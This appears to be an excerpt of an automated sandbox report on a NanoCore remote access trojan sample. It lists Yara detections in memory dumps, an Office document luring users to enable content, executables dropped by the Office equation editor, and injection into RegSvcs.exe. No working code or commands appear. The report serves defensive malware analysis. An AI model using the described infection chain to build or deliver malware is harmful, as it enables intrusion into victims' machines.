Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4

Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 21 22

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027626D	4_2_0027626D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002683C0	4_2_002683C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028C0B0	4_2_0028C0B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002630FC	4_2_002630FC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00280113	4_2_00280113
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027F3CA	4_2_0027F3CA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002733D3	4_2_002733D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026E510	4_2_0026E510
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00280548	4_2_00280548
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028C55E	4_2_0028C55E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026F5C5	4_2_0026F5C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027364E	4_2_0027364E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00290654	4_2_00290654
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002766A2	4_2_002766A2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00262692	4_2_00262692
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027589E	4_2_0027589E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027F8C6	4_2_0027F8C6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026E973	4_2_0026E973
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027397F	4_2_0027397F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026BAD1	4_2_0026BAD1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026DADD	4_2_0026DADD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00283CBA	4_2_00283CBA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027FCDE	4_2_0027FCDE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00276CDB	4_2_00276CDB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00265D7E	4_2_00265D7E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00263EAD	4_2_00263EAD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00283EE9	4_2_00283EE9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026DF12	4_2_0026DF12
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB35F0	5_2_00FB35F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB98F0	5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC2136	5_2_00FC2136
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCA137	5_2_00FCA137
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD427D	5_2_00FD427D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFF3A6	5_2_00FFF3A6
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB98F0	5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF655F	5_2_00FF655F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC2508	5_2_00FC2508
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FBF730	5_2_00FBF730
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC3721	5_2_00FC3721
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC28F0	5_2_00FC28F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCC8CE	5_2_00FCC8CE
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD088F	5_2_00FD088F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC1903	5_2_00FC1903
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFEAD5	5_2_00FFEAD5
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0102EA2B	5_2_0102EA2B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD3BA1	5_2_00FD3BA1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD0DE0	5_2_00FD0DE0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC1D98	5_2_00FC1D98
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF2D2D	5_2_00FF2D2D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF4EB7	5_2_00FF4EB7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFCE8D	5_2_00FFCE8D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD1F2C	5_2_00FD1F2C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_009243A0	6_2_009243A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092B310	6_2_0092B310
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092DEB8	6_2_0092DEB8
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_00923788	6_2_00923788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092BF28	6_2_0092BF28
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092C800	6_2_0092C800
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_00924458	6_2_00924458
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092BFE6	6_2_0092BFE6
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_00933788	13_2_00933788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_009343A0	13_2_009343A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_00934458	13_2_00934458

Contains functionality to launch a process as a different user

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF6219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

5_2_00FF6219

PE file contains strange resources

Source: mmuiqlcvwo.pif.4.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll	Jump to behavior

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\33920049\mmuiqlcvwo.pif C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Yara signature match

Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
